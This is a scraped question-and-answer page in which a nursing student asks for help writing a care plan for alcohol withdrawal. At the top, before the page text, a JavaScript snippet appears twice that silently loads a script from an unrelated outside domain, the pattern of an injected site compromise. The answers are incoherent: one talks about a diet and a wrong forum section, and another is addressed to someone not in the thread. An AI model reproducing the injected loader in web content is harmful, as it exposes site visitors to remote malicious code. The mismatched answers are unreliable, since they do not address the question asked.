;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Need help with a Nursing care plan for Alcohol withdrawal? It has to be based on medical problems no – El Hombre – Not only for men

Need help with a Nursing care plan for Alcohol withdrawal? It has to be based on medical problems no

shug Asked: Need help with a Nursing care plan for Alcohol withdrawal? It has to be based on medical problems no

I have to have two ND with four outcomes for each. Would like to risk for injury r/t alcohol withdrawal but I am having trouble coming up with for expected outcomes. The other ND I was thinking of using is Ineffective Health Maintenance or Impaired Nutrition but also having trouble coming up with four outcomes because everything I find for alcoholism is psych related in the care plan books. Any help would be greatly appreciated!


Kate Answered:
The question is asking, in layman's terms, just why someone might choose to go on the diet, or need to go on the diet – but Kat's right, it's in the wrong section.Maybe just note that for the future?Good luck with your project!

Got a better answer? Share it below!


  1. Hi Eliza,

    The risk of alcohol dependence begins at low levels of drinking. The risk increases directly with both the volume of alcohol consumed and a pattern of drinking larger amounts on an occasion.

    Young adults are particularly at risk.

    According to the National Institute on Alcohol Abuse and Alcoholism [NIAAA], men may be at risk for alcohol-related problems if their alcohol consumption exceeds 14 standard drinks per week or 4 drinks per day, and women may be at risk if they have more than 7 standard drinks per week or 3 drinks per day.

    A standard drink is defined as one 12-ounce bottle of beer, one 5-ounce glass of wine, or 1.5 ounces of distilled spirits.) Read more

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